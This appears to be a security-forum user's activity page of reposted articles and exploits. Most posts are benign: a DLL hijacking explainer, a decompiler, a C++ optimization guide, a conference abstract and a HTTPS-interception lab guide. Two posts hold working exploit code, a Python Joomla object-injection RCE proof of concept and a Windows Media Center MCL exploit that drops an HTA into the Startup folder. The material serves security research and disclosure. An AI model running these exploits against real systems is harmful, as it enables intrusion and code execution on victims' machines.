Jump to content

Nytro

Administrators
 View Profile  See their activity

  • Posts

    18725

  • Joined

  • Last visited

  • Days Won

    707

 Content Type 

Everything posted by Nytro

  1. Nytro
    Mai este valabil.
  2. Nytro

    Anti proxy

    Nytro replied to CatalinMarius's topic in Off-topic

    Scanezi cateva porturi comune pentru proxy-uri si le testezi: incerci sa trimiti un request. Poti de asemenea sa vezi daca necesita autentificare. Ar prinde multe proxy-uri "publice" (aka honeypots) dar ar fi extrem de lent.
  3. Nytro
    http://exfiltrated.com/research-Instagram-RCE.php
  4. Nytro
    DEF CON 23 - Ionut Popescu - NetRipper: Smart Traffic Sniffing for Penetration Testers Publicat pe 16 dec. 2015 The post-exploitation activities in a penetration test can be challenging if the tester has low-privileges on a fully patched, well configured Windows machine. This work presents a technique for helping the tester to find useful information by sniffing network traffic of the applications on the compromised machine, despite his low-privileged rights. Furthermore, the encrypted traffic is also captured before being sent to the encryption layer, thus all traffic (clear-text and encrypted) can be sniffed. The implementation of this technique is a tool called NetRipper which uses API hooking to do the actions mentioned above and which has been especially designed to be used in penetration tests, but the concept can also be used to monitor network traffic of employees or to analyze a malicious application. Speaker Bio Ionut works as a Senior Security Consultant at KPMG in Romania. He is passionate about ASM, reverse engineering, shellcode and exploit development and he has a MCTS Windows Internals certification. He spoke at various security conferences in Romania like: Defcamp, OWASP local meetings and others and also at the yearly Hacknet KPMG international conference in Helsinki and Berlin. Ionut is also the main administrator of the biggest Romanian IT security community: rstforums.com and he writes technical articles on a blog initiated by a passionate team: securitycafe.ro. Twitter: @NytroRST
  5. Nytro
    [h=1]Joomla 1.5 - 3.4.5 - Object Injection Remote Command Execution[/h] ''' Simple PoC for Joomla Object Injection. Gary @ Sec-1 ltd http://www.sec-1.com/ ''' import requests # easy_install requests def get_url(url, user_agent): headers = { 'User-Agent': user_agent } cookies = requests.get(url,headers=headers).cookies for _ in range(3): response = requests.get(url, headers=headers,cookies=cookies) return response def php_str_noquotes(data): "Convert string to chr(xx).chr(xx) for use in php" encoded = "" for char in data: encoded += "chr({0}).".format(ord(char)) return encoded[:-1] def generate_payload(php_payload): php_payload = "eval({0})".format(php_str_noquotes(php_payload)) terminate = '\xf0\xfd\xfd\xfd'; exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";''' injected_payload = "{};JFactory::getConfig();exit".format(php_payload) exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload) exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate return exploit_template pl = generate_payload("system('touch /tmp/fx');") print get_url("http://172.31.6.242/", pl) Sursa: https://www.exploit-db.com/exploits/38977/
  6. Nytro
    [h=1]Retargetable Decompiler[/h] Our main goal is to create a retargetable decompiler that can be utilized for source code recovery, static malware analysis, etc. The decompiler is supposed to be not bounded to any particular target architecture, operating system, or executable file format. [h=3]Features[/h] Handles all the commonly used file formats (ELF, PE, COFF). Currently supports the Intel x86, ARM, MIPS, PIC32, and PowerPC architectures. Can decompile to two output high-level languages: C and a Python-like language. Compiler and packer detection. Extraction and utilization of debugging information (DWARF, PDB). Signature-based removal of statically linked library code. Reconstruction of functions, high-level constructs, types, etc. Generation of call graphs, control-flow graphs, and various statistics. It is actively developed. You can try all of these features by using our online decompilation service. Sursa: https://retdec.com/
  7. Nytro
    Crash Course In DLL Hijacking by Tien Phan | December 10, 2015 Overview This week, we heard a lot about a DLL hijacking vulnerability from the security community. It began with a 0-day DLL hijacking in Microsoft Office which was discovered by an independent security researcher named Parvez Anwar. Shortly after, the website securify.nlpublished an article detailing this kind of attack and discussing the vast potential attack surface associated with DLLs and OLE. A dynamic link library (DLL) is a basic component in the Windows operating system. Certain DLLs will be loaded into Windows applications when they start if they are needed. DLLs provide software applications with resources such as Application Programming Interfaces (APIs) and additional procedures. If an attacker can control which DLL a program loads, then the attacker can insert a malicious DLL into the DLL loading process. In fact, this method is not new. Quite a few articles regarding this technique are available on the Internet, especially from Microsoft. In a nutshell, the vulnerability in this latest Microsoft 0-day lay in the way Microsoft Office searches for DLL components that are not present in the system, consequently allowing DLL hijacking attacks. But as we will detail below, that kind of vulnerability is not exclusive to Microsoft Office. Attack Details DLL search order is well documented by Microsoft. To recap, depending on the configuration of the system, a program can decide the order of the directories to be searched for a DLL to load. By default, the order of this search is as follows: The directory from which the application is loaded The current directory The system directory, usually C:\Windows\System32\ (The GetSystemDirectory function is called to obtain this directory.) The 16-bit system directory - There is no dedicated function to retrieve the path of this directory, but it is searched as well. The Windows directory. The GetWindowsDirector function is called to obtain this directory. The directories that are listed in the PATH environment variable. In this case, the current directory is the problem. When a program makes a decision to load a DLL from the current directory, it can lead to the DLL hijacking. For example, if the user is opening a Microsoft Word document, Microsoft Office will try to load its DLL component from the location of that document file. An attacker can then place a malicious DLL in the location of the document and as a result, Microsoft Office inadvertently loads the malicious code. Another practical scenario is sharing a Microsoft Document file using Windows sharing with a malicious DLL. If SafeDllSearchMode is enabled, it is more difficult for an attacker to use this technique. In such a case, the DLL search order is as follows: The directory specified by lpFileName function The System directory (The GetSystemDirectory function is called to obtain this directory.) The 16-bit system directory - There is no dedicated function to retrieve the path of this directory, but it is searched as well. The Windows directory (The GetWindowsDirector y function is called to obtain this directory.) The current directory The directories that are listed in the PATH environment variable. Note that this does not include the per-application path specified by the App Paths registry key. The App Paths key is not used when computing the DLL search path. Nonetheless, the current directory is still in the list of directories to be searched. The difference here is that the program searches system directories for a DLL component first and, if not found, will then try the current directory. How do I protect myself from DLL hijacking? The following is some guidance to prevent you from becoming a victim of DLL-hijacking attacks. For end users, the best way to prevent this attack is to apply the latest patch from the vendor. You can also harden your system using the following steps: Open Notepad Copy and paste the following text: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESystemCurrentControlSetControlSe ssion Manager] "SafeDllSearchMode"=dword:00000001 [HKEY_LOCAL_MACHINESystemCurrentControlSetControlSe ssion Manager] "CWDIllegalInDllSearch"=dword:ffffffff Save as “patch.reg” on your system. Double click patch.reg and click Yes on the Windows prompt. The above script will enable SafeDllSearchMode and disable loading of DLLs from the current directory. For developers, you can follow the suggestions from Microsoft. We also developed a small tool for learning and demonstration purposes. This tool will track new processes created. It will then apply a hook into any new process to force a call to the SetDLLDirectory API with a blank argument. This means that any new process will be protected from loading DLLs located in the current directory. You can get the source code of the tool here. The following is a quick demo of the tool: -= FortiGuard Lion Team =- by Tien Phan | December 10, 2015 Sursa: http://blog.fortinet.com/post/a-crash-course-in-dll-hijacking
  8. Nytro
    Optimizing software in C++An optimization guide for Windows, Linux and Macplatforms By Agner Fog. Technical University of Denmark. Copyright © 2004 - 2014. Last updated 2014-08-07. Contents1 Introduction ....................................................................................................................... 3 1.1 The costs of optimizing ............................................................................................... 4 2 Choosing the optimal platform........................................................................................... 5 2.1 Choice of hardware platform....................................................................................... 5 2.2 Choice of microprocessor ........................................................................................... 6 2.3 Choice of operating system......................................................................................... 6 2.4 Choice of programming language ............................................................................... 8 2.5 Choice of compiler.................................................................................................... 10 2.6 Choice of function libraries........................................................................................ 12 2.7 Choice of user interface framework........................................................................... 14 2.8 Overcoming the drawbacks of the C++ language...................................................... 14 3 Finding the biggest time consumers ................................................................................ 16 3.1 How much is a clock cycle? ...................................................................................... 16 3.2 Use a profiler to find hot spots .................................................................................. 16 3.3 Program installation .................................................................................................. 18 3.4 Automatic updates .................................................................................................... 19 3.5 Program loading ....................................................................................................... 19 3.6 Dynamic linking and position-independent code ....................................................... 20 3.7 File access................................................................................................................ 20 3.8 System database ...................................................................................................... 20 3.9 Other databases ....................................................................................................... 21 3.10 Graphics ................................................................................................................. 21 3.11 Other system resources.......................................................................................... 21 3.12 Network access ...................................................................................................... 21 3.13 Memory access....................................................................................................... 22 3.14 Context switches..................................................................................................... 22 3.15 Dependency chains ................................................................................................ 22 3.16 Execution unit throughput ....................................................................................... 22 4 Performance and usability ............................................................................................... 23 5 Choosing the optimal algorithm ....................................................................................... 24 6 Development process...................................................................................................... 25 7 The efficiency of different C++ constructs........................................................................ 26 7.1 Different kinds of variable storage............................................................................. 26 7.2 Integers variables and operators............................................................................... 29 7.3 Floating point variables and operators ...................................................................... 32 7.4 Enums ...................................................................................................................... 33 7.5 Booleans................................................................................................................... 33 7.6 Pointers and references............................................................................................ 36 7.7 Function pointers ...................................................................................................... 37 7.8 Member pointers....................................................................................................... 37 7.9 Smart pointers .......................................................................................................... 38 7.10 Arrays ..................................................................................................................... 38 7.11 Type conversions.................................................................................................... 40 7.12 Branches and switch statements............................................................................. 43 7.13 Loops...................................................................................................................... 45 2 7.14 Functions ................................................................................................................ 48 7.15 Function parameters ............................................................................................... 50 7.16 Function return types .............................................................................................. 50 7.17 Structures and classes............................................................................................ 51 7.18 Class data members (properties)............................................................................ 51 7.19 Class member functions (methods)......................................................................... 53 7.20 Virtual member functions ........................................................................................ 53 7.21 Runtime type identification (RTTI)........................................................................... 54 7.22 Inheritance.............................................................................................................. 54 7.23 Constructors and destructors .................................................................................. 55 7.24 Unions .................................................................................................................... 55 7.25 Bitfields................................................................................................................... 56 7.26 Overloaded functions .............................................................................................. 56 7.27 Overloaded operators ............................................................................................. 56 7.28 Templates............................................................................................................... 57 7.29 Threads .................................................................................................................. 60 7.30 Exceptions and error handling ................................................................................ 61 7.31 Other cases of stack unwinding .............................................................................. 65 7.32 Preprocessing directives ......................................................................................... 65 7.33 Namespaces........................................................................................................... 65 8 Optimizations in the compiler .......................................................................................... 66 8.1 How compilers optimize ............................................................................................ 66 8.2 Comparison of different compilers............................................................................. 74 8.3 Obstacles to optimization by compiler....................................................................... 77 8.4 Obstacles to optimization by CPU............................................................................. 81 8.5 Compiler optimization options ................................................................................... 81 8.6 Optimization directives.............................................................................................. 82 8.7 Checking what the compiler does ............................................................................. 84 9 Optimizing memory access ............................................................................................. 87 9.1 Caching of code and data ......................................................................................... 87 9.2 Cache organization................................................................................................... 87 9.3 Functions that are used together should be stored together...................................... 88 9.4 Variables that are used together should be stored together ...................................... 88 9.5 Alignment of data...................................................................................................... 90 9.6 Dynamic memory allocation...................................................................................... 90 9.7 Container classes ..................................................................................................... 93 9.8 Strings ...................................................................................................................... 96 9.9 Access data sequentially .......................................................................................... 96 9.10 Cache contentions in large data structures ............................................................. 96 9.11 Explicit cache control .............................................................................................. 99 10 Multithreading.............................................................................................................. 101 10.1 Hyperthreading ..................................................................................................... 103 11 Out of order execution................................................................................................. 103 12 Using vector operations............................................................................................... 105 12.1 AVX instruction set and YMM registers ................................................................. 107 12.2 AVX-512 instruction set and ZMM registers .......................................................... 107 12.3 Automatic vectorization......................................................................................... 107 12.4 Using intrinsic functions ........................................................................................ 109 12.5 Using vector classes ............................................................................................. 113 12.6 Transforming serial code for vectorization............................................................. 117 12.7 Mathematical functions for vectors........................................................................ 119 12.8 Aligning dynamically allocated memory................................................................. 120 12.9 Aligning RGB video or 3-dimensional vectors ....................................................... 120 12.10 Conclusion.......................................................................................................... 120 13 Making critical code in multiple versions for different instruction sets........................... 122 13.1 CPU dispatch strategies........................................................................................ 122 13.2 Model-specific dispatching.................................................................................... 124 13.3 Difficult cases........................................................................................................ 124 3 13.4 Test and maintenance .......................................................................................... 126 13.5 Implementation ..................................................................................................... 126 13.6 CPU dispatching in Gnu compiler ......................................................................... 128 13.7 CPU dispatching in Intel compiler ......................................................................... 130 14 Specific optimization topics ......................................................................................... 132 14.1 Use lookup tables ................................................................................................. 132 14.2 Bounds checking .................................................................................................. 134 14.3 Use bitwise operators for checking multiple values at once................................... 135 14.4 Integer multiplication............................................................................................. 136 14.5 Integer division...................................................................................................... 137 14.6 Floating point division ........................................................................................... 139 14.7 Don't mix float and double..................................................................................... 140 14.8 Conversions between floating point numbers and integers ................................... 141 14.9 Using integer operations for manipulating floating point variables......................... 142 14.10 Mathematical functions ....................................................................................... 145 14.11 Static versus dynamic libraries............................................................................ 146 14.12 Position-independent code.................................................................................. 148 14.13 System programming.......................................................................................... 150 15 Metaprogramming ....................................................................................................... 150 16 Testing speed.............................................................................................................. 153 16.1 Using performance monitor counters .................................................................... 155 16.2 The pitfalls of unit-testing ...................................................................................... 156 16.3 Worst-case testing ................................................................................................ 157 17 Optimization in embedded systems............................................................................. 158 18 Overview of compiler options....................................................................................... 160 19 Literature..................................................................................................................... 163 20 Copyright notice .......................................................................................................... 164 Download: http://www.agner.org/optimize/optimizing_cpp.pdf
  9. Nytro
    How To Perform "MITM Attack On HTTPS" Traffic Using Snifflab Posted by Kali Linux Researchers developed a technical test environment for capturing and decrypting WiFi data transmissions. The code for it lives on Github. Researchers created a WiFi hotspot that is continually collecting all the packets sent over it. All connected clients’ even HTTPS communications are subjected to a “Man-in-the-middle” attack, whereby they can later be decrypted for analysis. This article presents a detailed look at how this test environment works and then gets into how to set one up for your own testing purposes, including a list of required parts. Setting one up yourself is not user-friendly, and requires familiarity with the unix command line and networking concepts. Motivation Researchers and end-users alike often seek to understand what data their mobile device is sending to third parties. Unfortunately, monitoring one’s phone to see what, and to whom, data is sent is not exactly simple. Using packet capture software on Android is impossible without first rooting the device, and even then, difficult to use and export saved data. There are no applications to capture packets on iOS. Also See:How To Sniff The Browser History Using Sniffly Our motivation for creating the test environment described herein is to make it incredibly easy to capture packets for any device with a WiFi connection, with very little client configuration needed. How it works In our environment, dubbed Snifflab, a researcher simply connects to the Snifflab WiFi network, is prompted to install a custom certificate authority on the device, and then can use their device as needed for the test. Snifflab architecture All traffic on the network is logged by a Raspberry Pi dedicated to that task (“PCAP Collecting Machine”, in the Figure). The traffic is cloned by a Great Scott Gadgets Throwing Star LAN Tap, which routes it both to its destination, and to our Raspberry Pi. The Pi continually collects packet data, creating new packet capture (pcap) files at a regular interval, or once the active file reaches a configurable size. Saved files are regularly transferred to another machine (“Backup Machine”) for persistent storage. Users with SSH access to the Pi can also manually restart the pcap service, to get instant access to the captured packets, instead of waiting for the interval. The custom certificate that each client must install enables the proxy server (“MITM Proxy Machine”) through which Snifflab routes its traffic to intercept HTTPS requests to the outside world, and re-encrypt them using certificates generated on-the-fly. This allows for the researcher to later decrypt most captured network traffic sent over HTTPS. On the backup machine, the researcher has access to all previously-collected PCAPs, organized into folders by date, with each file named by the unix time at which the capture began. Also See:Network Scanning Using Nmap 7 From Basic To Advance The researcher may then open up the collected PCAP(s) in Wireshark or their utility of choice to analyze and decrypt the traffic. On packet captures A Packet capture (pcap) is a widely used data format for storing low-level network data transmission information. The packet is the base unit of data transmission on networks. To send a message from one computer to another, networking software breaks up the message into small packet files, each with metadata that — among other things — describes the source of the data, the destination, and the specific packet’s ID so that packets can be reassembled correctly at the destination. A pcap file is a collection of packets sent over a network. pcaps are created using software that “listens” to one or more network interfaces running on a given device, and dumps all the data packets it detects into a pcap file for future analysis. For example, one could listen on a computer’s WiFi interface, or the ethernet interface, or both. How-to This section describes the hardware, software, and configuration we used to set up Snifflab. It should be sufficient information to guide the creation of a new Snifflab instance from scratch. Snifflab router, PCAP machine, and LAN Tap Parts needed 1 router (in addition to your primary one), capable of running DD-WRT standard firmware 1 Raspberry Pi 2 Model B+ 1 server running all the time (Ubuntu) for backups and running the MITM proxy 1 Great Scott Gadgets Throwing Star LAN Tap 1 USB LAN adapter (TRENDnet TU3-ETG) 1 USB WiFi adapter (TP-Link TL-WN725N) Many Ethernet Cables The testing network We used a Cisco WRT54GL router to administer the Snifflab access point. We installed the DD-WRT Standard build firmware on this router. Please consult the DD-WRT guide to ensure your router is supported, lest you risk bricking your device. We connected this router’s internet port to our pre-existing LAN, creating a subnet with its own IP space. However, we don’t directly connect the router to the LAN. Between the LAN ethernet and the Snifflab router, we place a Great Scott Gadgets Throwing Star LAN Tap. This device allows us to passively sniff all traffic passing through it. In this manner, a copy of all network traffic is copied and directed to our PCAP collecting machine. Also See:How To Hack Facebook|Gmail And Twitter Account By Hacking Android Smartphone The LAN tap, unfortunately, has two separate ethernet ports for sniffing traffic. One is for inbound traffic, and the other, outbound. As such, the PCAP collecting machine needs to have two ethernet interfaces on which to listen for packets. This is discussed further below. Transparently proxying traffic to get MITM’d The router’s iptables must also be configured to transparently forward packets to the MITM proxy device. To do that, we login as administrator to the DD-WRT network portal, and navigate to Administration > Commands. There, we enter in the following commands, replacing the value of the PROXYIP variable with the IP address of your MITM proxy machine: PROXYIP=192.168.0.2 iptables -t mangle -A PREROUTING -j ACCEPT -p tcp -m multiport --dports 80,443 -s $PROXYIP iptables -t mangle -A PREROUTING -j MARK --set-mark 3 -p tcp -m multiport --dports 80,443 ip rule add fwmark 3 table 2 ip route add default via $PROXYIP dev vlan1 table 2 The last line in the above code refers to the vlan1 network interface; Make sure the network interface your router uses to communicate with the WAN is in fact vlan1 for your router, and adjust if needed. For example, this guide to setting up transparent proxies mentions br0 instead. Make it easy to get MITM’d The other thing we’d like our Snifflab router to do is to act as a convenient delivery service for our mitmproxy CA certificate. The method we chose is to make Snifflab a captive WiFi portal, meaning that users must visit a sign-in splash page before being able to use the network. We create a custom splash page for the user to sign into, and a redirect page from where the certificate can be downloaded after sign-in. A captive WiFi portal screen makes it simple to install the MITM certificate on a client device. To configure a captive WiFi portal, we login to the DD-WRT admin interface on Snifflab’s default gateway, and navigate to Services>Hotspot. We then enable NoCatSplash. Set up the NoCatSplash parameters to point the home page and splash URLS to a web server (hopefully running on your WAN) that serves redirect.html and splash.html as contained in the Git repository described below. Ensure that Homepage Redirection is turned on. Set a login timeout. The PCAP collecting machine In our system, a Raspberry Pi 2 Model B+ functions as the PCAP collecting machine. Setting up this Pi for sniffing network traffic sent to it from the LAN tap, and then backing up those captured packets to another machine, requires the configuration of multiple network interfaces. Also See:How To Perform Deauthentication Attack Using "Infernal Twin" On Single|Multiple Wifi Access Point Since the LAN tap splits inbound traffic to one ethernet port, and outbound to another, we need two ethernet interfaces on the Pi to capture both directions. However, packet capturing is much more straightforward if done on a single network interface. As such, we’ll have to bond the two ethernet connections into one network interface. To do that, install ifenslave and set networking interface commands as follows: sudo apt-get install ifenslave-2.6/etc/network/interfaces auto lo iface lo inet loopback iface eth0 inet manual iface eth1 inet manual allow-hotplug wlan0 iface wlan0 inet dhcp wpa-conf /etc/wpa_supplicant/wpa_supplicant.conf iface default inet dhcp auto bond0 iface bond0 inet dhcp bond-mode 3 bond-miimon 100 slaves eth0 eth1 Make sure bond-mode is set to 3, a “broadcast” policy, meaning all packets from all interfaces are transmitted via the bonding interface, otherwise packets may get dropped. WiFi Setting up WiFi driver for TP-Link TL-WN725N mkdir driver cd driver wget https://dl.dropboxusercontent.com/u/80256631/8188eu-v7-20150713.tar.gz tar xvzf 8188eu-v7-20150713.tar.gz sudo ./install.sh cd ../ rm -rf driver sudo reboot /etc/wpa_supplicant/wpa_supplicant.conf ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=netdev update_config=1 network={ ssid="" psk=hashofyourpassword proto=RSN key_mgmt=WPA-PSK pairwise=TKIP auth_alg=OPEN } Customize this script to suit your particular WiFi connection. It may be easier to generate a config file through the Raspberry Pi GUI. It’s also best practice to not store the plaintext version of your WiFi password in this file. Instead, run wpa_passphrase to generate a hash of the password. A WiFi connection is necessary since the two ethernet ports only receive traffic cloned from the LAN tap, and don’t actually connect to the network. Thus, a networking interface is needed so that one can SSH into your machine, and transmit pcap files to the backup machine. Getting the network running correctly on boot By default, on Raspberry Pis, if ethernet is plugged in then WiFi will be automatically disabled. First, turn off ethernet hotplugging, which causes WiFi to get disabled. /etc/default/ifplugd INTERFACES="eth0" HOTPLUG_INTERFACES="eth0" ARGS="-q -f -u0 -d10 -w -I" SUSPEND_ACTION="stop" Next, the below script runs at startup to ensure that multiple networking interfaces can operate simultaneously. We run the ifup command on each network interface to force start all of them. We also set the two ethernet interfaces to promiscuous mode to ensure they process all packets being routed to them, for complete sniffing. /etc/init.d/network.sh #!/bin/sh ### BEGIN INIT INFO # Provides: network.sh # Short-Description: Ensure WiFi as well as Ethernet interfaces are up # Description: # Default-Start: 2 3 4 5 # Default-Stop: 0 1 6 # Required-Start: $remote_fs $syslog # Required-Stop: $remote_fs $syslog ### END INIT INFO sudo ifplugd eth0 --kill sudo ifup wlan0 sudo ifup eth0 sudo ifup eth1 sudo ifconfig eth1 promisc sudo ifconfig eth0 promisc exit 0 Dependencies for collecting packets Ensure you setup your ~/.ssh/config to connect to your analysis machine without the need for a password, otherwise the backup script will fail. ssh-keygen -t rsa cat ~/.ssh/id_rsa.pub | ssh user@server 'cat >> .ssh/authorized_keysInstalling libpcap sudo apt-get install libpcap0.8 libpcap0.8-dev libpcap-devInstalling pip sudo apt-get install python3-pip sudo apt-get install python-pipInstalling pcapy wget https://pypi.python.org/packages/source/p/pcapy/pcapy-0.10.8.tar.gz tar xvzf pcapy-0.10.8.tar.gz cd pcapy-0.10.8/ python setup.py installInstalling dpkt pip install dpkt pip install dpkt --upgradeMake sure timezone is set correctly tzconfig sudo dpkg-reconfigure tzdata Capturing Packets Get the latest code from Github. This guide refers to a copy of the repo housed at /home/pi/snifflab. This repository contains sniffer.py, a Python application developed to capture packets on an interface into PCAPs, creating new ones at a fixed interval, or when a file size limit is reached. The interface, interval, and filesize limit are all configurable command line parameters: -i (specify the network interface) -s (specify the file size limit) -t (specify the time interval, in seconds, between new PCAP files) -f (specify a filename suffix to append to each PCAP. -u (specify a ssh username for a remote backup) -h (specify a ssh host for remote backup) -p (specify the path on the remote host for backup) The script also backs up old PCAPs to a separate machine by launching an external bash script upon the creation of a new PCAP file. As described above, there are also parameters to specify the remote backup server username, hostname, and path for SCPing the PCAPs: Move the repository’s splash.html and redirect.html to the WAN web server of your choice, asdescribed above. Edit the link in splash.html to correspond to your Snifflab router’s IP address. Configure the backup script Make sure to add the PCAP machine’s public SSH key to the known_hosts file on the remote machine, or else movescript will prompt the user for a password. Start capturing packets on startup — create a sniffer service The simplest way to ensure reliably consistent packet capturing is to wrap sniffer.py in an upstart service, so it can easily be started on boot, and restarted as needed. To do that, create and edit the file below: /etc/init/sniffer.conf #sniffer.conf start on runlevel [2345] stop on runlevel [016] script exec echo "hi" cd /home/pi/mitm if [ -z "$filenamesuffix" ]; then exec python sniffer.py -i bond0 -s 100 -t 120 else exec python sniffer.py -i bond0 -s 100 -t 120 -f $filenamesuffix fi end script Make sure to edit the parameters of sniffer.py to suit your needs, based on the previous section. With this service all set up, it is easy to start / stop collecting packets: sudo service sniffer startThis service supports an additional parameter, a filename suffix. This will cause all pcaps collected by the service to be saved with the parameter as a file suffix. For instance, running sudo service sniffer start filenamesuffix=test1will yield timestamped packets with test1 as a suffix, similar to 123456789_test1.pcap. This makes it easy to label collected pcaps. When starting a new test, simply restart the service with a new filename suffix: sudo service sniffer restart filenamesuffix=mynewtestOf course, if the filenamesuffix parameter is missing, no suffix is included in the filename. After completing a test, I usually restart the service without a suffix, to cleanly demarcate the completion of the test in the filesystem. The MITM Proxy machine In our environment, we used a machine running Ubuntu Server operating system to act as a proxy that replaces SSL certificates with those under our control. It does this by relying on the well-knownmitmproxy software. Our MITM proxy machine exists outside of the Snifflab network, on the WAN. Snifflab forwards all traffic to this machine. This section describes how to configure a service that runs a transparent mitmproxy on startup. First, install mitmproxy and mitmdump, following the guide on their website. Now, we can set up a default configuration for mitmproxy to refer to on runtime. In our environment, we created a directory: sudo mkdir /etc/mitmproxy sudo chmod -R 755 /etc/mitmproxy touch /etc/mitmproxy/common.confEdit common.conf to match the following: --cadir=/etc/mitmproxy/cybersniff --port=4567 --noappI chose an arbitrary port number because I do not like using defaults. (mitmproxy defaults to 8080). Now, create a directory to store the mitmproxy certificate authority information: mkdir cybersniffNext, generate your own certificate for mitmdump to use as a CA. I do this so I don’t have to trust mitmproxy’s CA. Mitmproxy has a guide on how to generate your own certificate. I would recommend adding –days 1000 to the certificate generation step, to ensure the cert doesn’t expire for some time. Make sure the certificate files are stored in the path referred to in common.conf Now, let’s set up a service to ensure the proxy starts on boot, and can be easily started and stopped as needed: touch /etc/init/mitm.confEdit your newly-created mitm.conf to include the following: # mitm.conf start on filesystem script sudo iptables -A PREROUTING -t nat -i em1 -p tcp -m multiport --dports 80,443 -j REDIRECT --to-port 4567 SSLKEYLOGFILE=/var/log/mitmkeys.log export SSLKEYLOGFILE echo "MITM Keys being logged here: $SSLKEYLOGFILE" exec mitmdump -T --host --conf=/etc/mitmproxy/common.conf end script This service does several things. First of all, it starts when the filesystem is loaded. You can also start, stop, and restart it using commands like: service mitm stopSecondly, the service sets up iptables rules to route all incoming traffic on ports 80 and 443 to port 4567 (change this value to correspond to your mitmproxy port defined in common.conf). Next, it specifies an SSLKEYLOGFILE environment variable. This is important, as it provides a place for mitmproxy to save session keys used to set up encrypted communications. With these keys being routinely logged, we can point wireshark to this location (discussed below), and use it to decrypt SSL traffic that uses Diffie-Hellman key exchange. Finally, the service runs mitmdump (a non-interactive version of mitmproxy) in transparent mode, using the configuration file we previously created. Important: One last thing to do in order to ensure that devices connect to Snifflab can access HTTPS resources without a certificate error is to copy the generated .pem file for your custom CA certificate to the web directory where redirect.html is located. Edit the link in redirect.html (included in the Github repo, and hosted on your web server) to point users to download your pem file for them to install on their device. Also See:How To Hack Facebook Account Password Using Brute Force Attack Of course, you can develop your own way of providing the certificate to devices on the network. Analysing the data in Wireshark To decrypt packets that have been encrypted using perfect forward secrecy, it’s best to have the latest version of Wireshark installed. This might mean adding the Wireshark development PPA to your Ubuntu environment. Next, configure Wireshark’s Preferences > Protocols > SSL to utilize your MITM proxy’s CA bundled certificate file as well as the master keys list MITMproxy is logging. Click on RSA Keys, and enter the following: [TABLE=width: 668] [TR] [TD]IP address[/TD] [TD]Port[/TD] [TD]Protocol[/TD] [TD]Key File[/TD] [/TR] [TR=bgcolor: #EEEEEE] [TD]0.0.0.0[/TD] [TD]443[/TD] [TD]http[/TD] [TD]/path/to/mitmproxy-ca.pem[/TD] [/TR] [/TABLE] This tells Wireshark to attempt to decrypt all traffic (0.0.0.0 is a stand-in address for any IP) on port 443 as HTTP data, using your key file. Back in the main SSL protocol preference pane, set up an SSL debug file to you can assess any errors that might occur. Finally, point (Pre)-Master-Secret log filename to the path set in the $SSLKEYLOGFILE environment variable (or a place you copy that log file to). With this, you can load any of the PCAP files collected on the SniffLab network and decrypt HTTPS connections! Happy hacking. Sursa http://kalilinuxcourse.blogspot.in/2015/12/how-to-perform-mitm-attack-on-https-traffic.html
      • 2
      • Upvote
  10. Nytro
    function ctafinal() { setTimeout(function() { $(".loadertxt").txtFader("Trimitem raspunsurile catre KENT.ro"); setTimeout(function() { $(".loadertxt").txtFader("Felicitari! Ai castigat!"); setTimeout(function() { $("#final").fadeOut(250, function() { $("#finalcta").fadeIn(250); }); }, 3000); }, 3000); }, 2500); $(".loadertxt").txtFader("Trimitem raspunsurile catre KENT.ro"); setTimeout(function() { $(".loadertxt").txtFader("Felicitari! Ai castigat!"); Ca sa vezi, stie ca ai castigat fara sa trimita ceva catre "kent.ro" Inca o mizerie care va permite sa vedeti cati prieteni grav batuti in cap aveti. Intelegeti, NIMIC nu e gratis in lumea asta.
  11. Nytro
    [/FONT][/COLOR]Title: Microsoft Windows Media Center Library Parsing RCE Vuln aka "self-executing" MCL file (CVE-2015-6131) Software Vendor: Microsoft Software version : MS Windows Media Center latest version on any Windows OS. Software Vendor Homepage: http://www.microsoft.com CVE: CVE-2015-6131 Exploit Author: Eduardo Braun Prado Vulnerability oficial discoverer: Zhang YunHai of NSFOCUS Security Team date: december 8, 2015 Vulnerability description: Windows Media Center contains a remote code execution vulnerability because it allows "MCL" files to reference themselves as HTML pages, which will be parsed inside Windows Media Center window, in the context of the local machine security zone of Internet Explorer browser. This in turn allows execution of arbitrary code using eg. ADO ActiveX Objects. AKA "self-executing" MCL files. exploit code below: ----------- self-exec-1.mcl ------------------------------------ <application url="self-exec1.mcl"/><html><script>alert(' I am running in local machine zone which allows arbitrary code execution via, for example, ADO Objects')</script></html> ------------------------------------------------------------ ----------self-exec-2.mcl-------------------------------------- <application url="self-exec2.mcl"/><html><b>Use a sniffer software to sniff SMB traffic and retrieve the remote Windows username required for this exploit</b><img src=\\192.168.10.10\smbshare\someimg.jpg></img><script> RecordsetURL='http://192.168.10.10:80/recordsetfile.txt'; var rs = new ActiveXObject('ADODB.recordset'); rs.Open(RecordsetURL); rs.Save('C:/users/windowsuser/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/poc.hta'); rs.Close(); </script></html> ---------------------------------------------------------- -----Create-recordsetfile.hta -------------- <html><body onload="aa()"> <script language="VBScript"> function aa() defdir="." alert "This script will retrieve data from ""recordsetdata.txt"" and save it to the current directory as ""recordsetfile.txt"". Set c = CreateObject("ADODB.Connection") co = "Driver={Microsoft Text Driver (*.txt; *.csv)};DefaultDir=" & defdir & ";Extensions=txt;" c.Open co set rs =CreateObject("ADODB.Recordset") rs.Open "SELECT * from recordsetdata.txt", c al=rs.Save(defdir & "\recordsetfile.txt") rs.close end function </script></body></html> ------------------------------------------------------------------------------- ---------recordsetdata.txt------------------------------------------ <html> <script>a=new ActiveXObject('Wscript.Shell')</script> <script>a.Run('calc.exe',1);</script> </html> -------------------------------------------------------------------[COLOR=#000000][FONT=Consolas] Sursa: https://www.exploit-db.com/exploits/38911/
  12. Nytro
